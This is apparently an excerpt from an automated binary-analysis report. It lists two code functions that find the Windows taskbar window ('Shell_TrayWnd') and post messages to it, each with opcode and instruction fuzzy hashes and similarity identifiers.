                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00445BF5
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00445C08
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: e7e7b9c32e8572e80712c20760607b92bc8296822bfd56eb1766b8339d531c91
                                                    • Instruction ID: 6fe2307d033170ccbb21eb5d7841f285e463e24cb72e628f5aae5a58281fe650
                                                    • Opcode Fuzzy Hash: e7e7b9c32e8572e80712c20760607b92bc8296822bfd56eb1766b8339d531c91
                                                    • Instruction Fuzzy Hash: 5CD0C935388311B6E764BB70AC0BFD76A14AB41B51F11083AB649AA1D1D9F85805C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00445C35
                                                    • PostMessageW.USER32(00000000), ref: 00445C3C
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 16243b35b064243f988e0571259f9df8cc96bf8956ac7cd0586437ba14ce9c91
                                                    • Instruction ID: d945b4402d5d5eccbb4cb3dfc2e4f825198afcaa16e61c5f907aca3b7e5a99be
                                                    • Opcode Fuzzy Hash: 16243b35b064243f988e0571259f9df8cc96bf8956ac7cd0586437ba14ce9c91
                                                    • Instruction Fuzzy Hash: 88D0A9313843107AF324BB30AC0BFC76610AB02B00F00083AB205AA0D1C8F86800C208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%